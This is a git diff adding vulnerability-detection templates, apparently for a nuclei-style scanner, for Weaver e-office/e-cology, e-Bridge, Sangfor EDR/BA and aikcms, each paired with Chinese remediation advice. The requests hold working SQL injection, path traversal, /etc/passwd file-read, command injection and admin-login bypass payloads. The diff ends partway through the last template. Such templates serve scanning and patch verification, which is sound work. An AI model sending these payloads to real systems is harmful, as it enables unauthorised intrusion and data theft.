--- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256OA/wooyun-2015-0125638_2.yaml" @@ -0,0 +1,41 @@ +id: wooyun-2015-0125638_2 +info: + name: 泛微e-office officeserver.php 任意文件读取 + author: + - 折跃 + description: |- + 泛微 E-office officeserver.php 任意文件读取漏洞 + 泛微 E-office是泛微协同办公产品系列的成员之一,贴合办公应用实际需求,实行通用化的产品设计。 + + 泛微 E-office中存在任意文件读取漏洞,攻击者可利用该漏洞读取任意文件。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.weaver.com.cn/ + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'www.weaver.com.cn') + path: + - '{{BaseURL}}/{{varPath}}?OPTION=LOADTEMPLATE&COMMAND=INSERTFILE&TEMPLATE=../../readme.txt' + attack: batteringram + method: GET + payloads: + varPath: + - iweboffice/officeserver.php + - iweboffice/officeserver2.php + headers: + Host: '{{Hostname}}' + req-condition: true + stop-at-first-match: true diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256OA/wooyun-2015-0126024_1.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256OA/wooyun-2015-0126024_1.yaml" new file mode 100755 index 000000000..29f25bf93 --- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256OA/wooyun-2015-0126024_1.yaml" @@ -0,0 +1,41 @@ +id: wooyun-2015-0126024_1 +info: + name: 泛微e-office group_xml sql注入 + author: + - 折跃 + description: |- + 泛微 E-cology group_xml SQL注入漏洞 + 泛微协同管理应用平台(e-cology)是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台,e-cology可形成一系列的通用解决方案和行业解决方案。 + + 泛微 E-cology中存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.weaver.com.cn/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,verify) + - '!contains(body,"%2F%5Bgroup%5D%3A%5B1%5D%7C%5Bgroupid%5D%3A%5B1%20union%20select")' + path: + - '{{BaseURL}}/[group]:[1]|[groupid]:[1 union select {{verify}}]' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256OA/wooyun-2015-0130759.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256OA/wooyun-2015-0130759.yaml" new file mode 100755 index 000000000..012495e6c --- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256OA/wooyun-2015-0130759.yaml" @@ -0,0 +1,38 @@ +id: wooyun-2015-0130759 +info: + name: 泛微 E-cology com.eweaver.base.DataAction SQL注入漏洞 + author: + - 折跃 + description: |- + 泛微 E-cology com.eweaver.base.DataAction SQL注入漏洞 + 泛微协同管理应用平台(e-cology)是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台,e-cology可形成一系列的通用解决方案和行业解决方案。 + + 泛微 E-cology中存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.weaver.com.cn/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'b6bb02ed731aee') + path: + - '{{BaseURL}}/ServiceAction/com.eweaver.base.DataAction?sql=select%20CONCAT(CONCAT(CONCAT(CONCAT(CHR(98),CHR(54)),CONCAT(CHR(98),CHR(98))),CONCAT(CONCAT(CHR(48),CHR(50)),CONCAT(CHR(101),CHR(100)))),CONCAT(CONCAT(CONCAT(CHR(55),CHR(51)),CONCAT(CHR(49),CHR(97))),CONCAT(CHR(101),CHR(101)))),2,3,4,5,6,7,8,9,10%20from%20DUAL%20' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256OA/wooyun-2015-0136818.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256OA/wooyun-2015-0136818.yaml" new file mode 100755 index 000000000..9f0bac55f --- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256OA/wooyun-2015-0136818.yaml" @@ -0,0 +1,114 @@ +id: wooyun-2015-0136818 +info: + name: 泛微e-cology多处SQL注入漏洞 + author: + - 折跃 + description: |- + 泛微 E-cology 多处SQL注入漏洞 + 泛微协同管理应用平台(e-cology)是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台,e-cology可形成一系列的通用解决方案和行业解决方案。 + + 泛微 E-cology中存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.weaver.com.cn/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'c4ca4238a0b923820dcc509a6f75849b') + - '!contains(body,''select'')' + path: + - '{{BaseURL}}/pweb/careerapply/HrmCareerApplyPerEdit.jsp?id=1%20union%20select%201%2C2%2C3%2Csys.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%271%27%29%29%2C5%2C6%2C7' + - '{{BaseURL}}/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201%2C2%2C3%2Csys.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%271%27%29%29%2C5%2C6%2C7' + - '{{BaseURL}}/pweb/careerapply/HrmCareerApplyWorkEdit.jsp?id=1%20union%20select%201%2C2%2C3%2Csys.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%271%27%29%29%2C5%2C6' + - '{{BaseURL}}/pweb/careerapply/HrmCareerApplyWorkView.jsp?id=1%20union%20select%201%2C2%2C3%2Csys.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%271%27%29%29%2C5%2C6' + - '{{BaseURL}}/web/careerapply/HrmCareerApplyPerEdit.jsp?id=1%20union%20select%201%2C2%2C3%2Csys.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%271%27%29%29%2C5%2C6%2C7' + - '{{BaseURL}}/web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201%2C2%2C3%2Csys.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%271%27%29%29%2C5%2C6%2C7' + - '{{BaseURL}}/web/careerapply/HrmCareerApplyWorkEdit.jsp?id=1%20union%20select%201%2C2%2C3%2Csys.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%271%27%29%29%2C5%2C6' + - '{{BaseURL}}/web/careerapply/HrmCareerApplyWorkEdit.jsp?id=1%20union%20select%201%2C2%2C3%2Csys.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%271%27%29%29%2C5%2C6' + - '{{BaseURL}}/E-mobile/calendar_page.php?detailid=-5272%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2Cmd5%281%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--' + - '{{BaseURL}}/web/broswer/CustomerDescBrowser.jsp?sqlwhere=where%201=2+union+all+select+1,md5(1),3' + - '{{BaseURL}}/web/broswer/CustomerSizeBrowser.jsp?sqlwhere=where%201=2+union+all+select+1,md5(1),3' + - '{{BaseURL}}/web/broswer/ContacterTitleBrowser.jsp?sqlwhere=where%201=2+union+all+select+1,md5(1),3' + - '{{BaseURL}}/web/broswer/CityBrowser.jsp?sqlwhere=where%201=2+union+all+select+1,md5(1),3' + - '{{BaseURL}}/mobile/plugin/loadWfGraph.jsp?workflowid=1&requestid=1' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true + stop-at-first-match: true +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 + - (duration_2 - duration_1) >= 5 + path: + - '{{BaseURL}}/{{tmpPath}}' + - '{{BaseURL}}/{{tmpPath}}%20WAITFOR%20DELAY%20%270%3A0%3A5%27' + method: GET + payloads: + attack: batteringram + tmpPath: + - web/careerapply/HrmCareerApplyAdd.jsp?careerid=1 + - E-mobile/diarydo.php?diff=reply&diary_id=9 + - E-mobile/source_page.php?pagediff=email&emailid=1 + - E-mobile/emailreply_page.php?detailid=1 + - E-mobile/email_page.php?detailid=1 + - meeting/Maint/MeetingTypeCheck.jsp?typename=aaa111&id=1 + headers: + Host: '{{Hostname}}' + req-condition: true + stop-at-first-match: true +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - (body_1 == body_2) && (body_2 != body_3) + path: + - '{{BaseURL}}/{{varPath}}?typename=aaa111&id=-1' + - '{{BaseURL}}/meeting/Maint/MeetingTypeCheck.jsp?typename=aaa111&id=-1+and+1=1' + - '{{BaseURL}}/meeting/Maint/MeetingTypeCheck.jsp?typename=aaa111&id=-1+and+1=2' + attack: batteringram + method: GET + payloads: + varPath: + - meeting/Maint/MeetingTypeCheck.jsp?typename=aaa111&id=-1 + - web/broswer/SectorInfoBrowser.jsp?sqlwhere=where%201=1 + headers: + Host: '{{Hostname}}' + req-condition: true + stop-at-first-match: true +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'qcqtq1qmzoq') + - '!contains(body,''SELECT'')' + path: + - '{{BaseURL}}/mobile/plugin/loadWfGraph.jsp?workflowid=1&requestid=1%27%20AND%209830%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%2899%29%7C%7CCHR%28113%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283708%3D3708%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28109%29%7C%7CCHR%28122%29%7C%7CCHR%28111%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%271%27%3D%271' + - '{{BaseURL}}/ServiceAction/com.eweaver.workflow.subprocess.servlet.SubprocessAction?action=getlist&nodeid=1%27%20AND%209830%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%2899%29%7C%7CCHR%28113%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283708%3D3708%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28109%29%7C%7CCHR%28122%29%7C%7CCHR%28111%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%271%27%3D%271' + - '{{BaseURL}}/ServiceAction/com.eweaver.workflow.workflow.servlet.WorkflowinfoAction?action=getreqxml&workflowid=1&id=2%27%20AND%209830%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%2899%29%7C%7CCHR%28113%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283708%3D3708%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28109%29%7C%7CCHR%28122%29%7C%7CCHR%28111%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%271%27%3D%271' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true + stop-at-first-match: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256OA/wooyun-2015-0136933.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256OA/wooyun-2015-0136933.yaml" new file mode 100755 index 000000000..d1f84bed5 --- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256OA/wooyun-2015-0136933.yaml" @@ -0,0 +1,52 @@ +id: wooyun-2015-0136933 +info: + name: 泛微 E-cology more.jsp eid参数 SQL注入漏洞 + author: + - 折跃 + description: |- + 泛微 E-cology more.jsp eid参数 SQL注入漏洞 + 泛微协同管理应用平台(e-cology)是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台,e-cology可形成一系列的通用解决方案和行业解决方案。 + + 泛微 E-cology中存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.weaver.com.cn/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - duration >= 5 + path: + - '{{BaseURL}}/page/element/news/more.jsp?ebaseid=news&eid=1123%20AND%208609%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%28116%29%7C%7CCHR%28117%29%7C%7CCHR%28118%29%2C5%29' + - '{{BaseURL}}/page/element/news/more.jsp?ebaseid=news&eid=1123%20WAITFOR%20DELAY%20%270%3A0%3A5%27' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - body_1 != body_2 + path: + - '{{BaseURL}}/page/element/news/more.jsp?ebaseid=news&eid=-1%20or%201%3D1' + - '{{BaseURL}}/page/element/news/more.jsp?ebaseid=news&eid=-1%20or%201%3D2' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256\344\272\221\346\241\245 e-Bridge/E_bridge-lfi-saveYZJFile.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256\344\272\221\346\241\245 e-Bridge/E_bridge-lfi-saveYZJFile.yaml" new file mode 100755 index 000000000..fd8120e90 --- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256\344\272\221\346\241\245 e-Bridge/E_bridge-lfi-saveYZJFile.yaml" @@ -0,0 +1,44 @@ +id: E_bridge-lfi-saveYZJFile +info: + name: 泛微云桥e-bridge任意文件读取漏洞 + author: + - 折跃 + description: |- + 泛微云桥 e-Bridge 任意文件读取漏洞 + 泛微云桥(e-Bridge)是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。 + + 泛微 E-office中存在任意文件读取漏洞,攻击者可利用该漏洞读取任意文件。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.weaver.com.cn/ + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_2==200 + - contains(body_2,'root:x:0:0:root:/root:/bin/bash') + extractors: + - name: bannar + type: regex + regex: + - extension":"txt","id":"(.+)","createtime + group: 1 + part: body + internal: true + path: + - '{{BaseURL}}/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt' + - '{{BaseURL}}/file/fileNoLogin/{{bannar}}' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/\346\267\261\344\277\241\346\234\215\347\273\210\347\253\257\346\243\200\346\265\213\345\223\215\345\272\224\345\271\263\345\217\260(EDR)/CNVD-2020-46552.yaml" "b/config/51pwn/yaml/\346\267\261\344\277\241\346\234\215\347\273\210\347\253\257\346\243\200\346\265\213\345\223\215\345\272\224\345\271\263\345\217\260(EDR)/CNVD-2020-46552.yaml" new file mode 100755 index 000000000..351b44b1e --- /dev/null +++ "b/config/51pwn/yaml/\346\267\261\344\277\241\346\234\215\347\273\210\347\253\257\346\243\200\346\265\213\345\223\215\345\272\224\345\271\263\345\217\260(EDR)/CNVD-2020-46552.yaml" @@ -0,0 +1,25 @@ +id: CNVD-2020-46552 +info: + name: Sangfor EDR - Remote Code Execution + author: + - l0ne1y + description: |- + 深信服终端监测响应平台(EDR)远程命令执行漏洞 + 深信服终端监测响应平台(EDR)存在远程命令执行漏洞。攻击者可通过构造HTTP请求来利用此漏洞,成功利用此漏洞的攻击者可以在目标主机上执行任意命令。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.sangfor.com.cn/product/net-safe-mobile-security-edr.html +requests: +- matchers: + - type: dsl + condition: and + dsl: + - contains(body, "$show_input = function($info)") + - contains(body, "$strip_slashes($host)") + - contains(body, "Log Helper") + - status_code == 200 + path: + - '{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php' + method: GET diff --git "a/config/51pwn/yaml/\346\267\261\344\277\241\346\234\215\347\273\210\347\253\257\346\243\200\346\265\213\345\223\215\345\272\224\345\271\263\345\217\260(EDR)/sangfor-edr-auth-bypass.yaml" "b/config/51pwn/yaml/\346\267\261\344\277\241\346\234\215\347\273\210\347\253\257\346\243\200\346\265\213\345\223\215\345\272\224\345\271\263\345\217\260(EDR)/sangfor-edr-auth-bypass.yaml" new file mode 100755 index 000000000..fca825c75 --- /dev/null +++ "b/config/51pwn/yaml/\346\267\261\344\277\241\346\234\215\347\273\210\347\253\257\346\243\200\346\265\213\345\223\215\345\272\224\345\271\263\345\217\260(EDR)/sangfor-edr-auth-bypass.yaml" @@ -0,0 +1,43 @@ +id: sangfor-edr-auth-bypass +info: + name: Sangfor EDR Authentication Bypass + author: + - l0ne1y + description: |- + 深信服EDR任意用户登录漏洞 + Sangfor EDR中的一个漏洞允许远程攻击者使用“管理员”特权访问系统,直接使用提供的用户名访问登录页面,而不是通过登录 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.sangfor.com.cn/product/ + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 + 3、直接对象引用的加密资源ID,防止攻击者枚举ID,敏感数据特殊化处理。 + 4、采用成熟的权限管理框架,如spring security。 + 5、用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)优先采用在服务端关联session或加密后放在session中的方式获取。 + 6、必须采用表单或其他参数提交用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)时,应尽可能采用难以猜测的构造方式(增加字母及随机数字等)或采用复杂的加密算法加密后提交,应对客户端提交的凭证与会话的权限进行严格的验证,如提交的产品号码是否为隶属于登录用户的产品号码。 + 7、对管理功能模块进行严格的权限验证,如非必要建议不对互联网开放或进行网络层的访问控制。 +requests: +- matchers: + - type: word + part: body + words: + - /download/edr_installer_ + - type: word + part: header + negative: true + words: + - Set-Cookie="" + - type: word + part: header + words: + - Set-Cookie= + - type: status + status: + - 302 + matchers-condition: and + path: + - '{{BaseURL}}/ui/login.php?user=admin' + method: GET diff --git "a/config/51pwn/yaml/\346\267\261\344\277\241\346\234\215\347\273\210\347\253\257\346\243\200\346\265\213\345\223\215\345\272\224\345\271\263\345\217\260(EDR)/sangfor-edr-rce.yaml" "b/config/51pwn/yaml/\346\267\261\344\277\241\346\234\215\347\273\210\347\253\257\346\243\200\346\265\213\345\223\215\345\272\224\345\271\263\345\217\260(EDR)/sangfor-edr-rce.yaml" new file mode 100755 index 000000000..d968878aa --- /dev/null +++ "b/config/51pwn/yaml/\346\267\261\344\277\241\346\234\215\347\273\210\347\253\257\346\243\200\346\265\213\345\223\215\345\272\224\345\271\263\345\217\260(EDR)/sangfor-edr-rce.yaml" @@ -0,0 +1,37 @@ +id: sangfor-edr-rce +info: + name: Sangfor EDR 3.2.17R1/3.2.21 RCE + author: + - l0ne1y + description: |- + 深信服EDR3.2.21任意命令执行漏洞 + Sangfor EDR产品中的一个漏洞允许未经身份验证的远程用户导致产品执行任意命令。 + severity: critical + remediation: |- + 官方修复建议: + 1、升级系统至无漏洞版本,或于官网下载安全补丁。 + https://www.sangfor.com.cn/product/ + + 临时修复建议: + 1、尽量不去执行外部的应用程序或命令。 + 2、使用自定义函数或函数库实现外部应用程序或命令的功能。 + 3、在执行system、eval等命令执行功能的函数前,校验参数内容。 + 4、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\’”,双引号“””会被转义为“\””,分号“;”会被转义为“;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 + 5、使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。 +requests: +- matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9' + method: POST + body: | + {"params":"w=123\"'1234123'\"|cat /etc/passwd"} + headers: + Content-Type: application/x-www-form-urlencoded diff --git "a/config/51pwn/yaml/\346\267\261\344\277\241\346\234\215\350\241\214\344\270\272\346\204\237\347\237\245\347\263\273\347\273\237(BA)/sangfor-ba-rce.yaml" "b/config/51pwn/yaml/\346\267\261\344\277\241\346\234\215\350\241\214\344\270\272\346\204\237\347\237\245\347\263\273\347\273\237(BA)/sangfor-ba-rce.yaml" new file mode 100755 index 000000000..fa90b68a5 --- /dev/null +++ "b/config/51pwn/yaml/\346\267\261\344\277\241\346\234\215\350\241\214\344\270\272\346\204\237\347\237\245\347\263\273\347\273\237(BA)/sangfor-ba-rce.yaml" @@ -0,0 +1,33 @@ +id: sangfor-ba-rce +info: + name: Sangfor BA - Remote Code Execution + author: + - l0ne1y + description: |- + 深信服行为感知系统远程命令执行漏洞 + Sangfor产品的一个漏洞允许远程未经身份验证的用户导致产品执行任意命令。 + severity: critical + remediation: |- + 官方修复建议: + 1、升级系统至无漏洞版本,或于官网下载安全补丁。 + https://www.sangfor.com.cn/product/ + + 临时修复建议: + 1、尽量不去执行外部的应用程序或命令。 + 2、使用自定义函数或函数库实现外部应用程序或命令的功能。 + 3、在执行system、eval等命令执行功能的函数前,校验参数内容。 + 4、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\’”,双引号“””会被转义为“\””,分号“;”会被转义为“\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 + 5、使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。 +requests: +- matchers: + - type: word + part: body + words: + - '{{md5("{{randstr}}")}}' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/tool/log/c.php?strip_slashes=md5&host={{randstr}}' + method: GET diff --git "a/config/51pwn/yaml/\347\210\261\345\256\242CMS/CNVD-2019-13870.yaml" "b/config/51pwn/yaml/\347\210\261\345\256\242CMS/CNVD-2019-13870.yaml" new file mode 100755 index 000000000..cd675069e --- /dev/null +++ "b/config/51pwn/yaml/\347\210\261\345\256\242CMS/CNVD-2019-13870.yaml" @@ -0,0 +1,78 @@ +id: CNVD-2019-13870 +info: + name: aikcms_v2.0.0_admin_page_system_admin.php_文件上传getshell + author: + - jim2g + description: | + aikcms_v2.0.0_admin_page_system_admin.php_存在文件上传漏洞 + 在Web程序中,通常会涉及到一些文件上传的功能,如头像上传、图片上传、附件上传等,由于Web中间件会根据用户的请求去执行特定后缀的文件(asp、php、cgi、aspx、jsp等),如果在上传文件的功能中未限制上传文件的后缀,导致可以上传“asp、php、cgi、aspx、jsp、html”等后缀的执行文件时,那么攻击者可以利用此漏洞上传恶意的可执行文件来执行恶意的代码,比如文件读写、命令执行,这样即可直接控制服务器。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.aikcms.com/ + 临时修复方案: + 文件上传: + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME 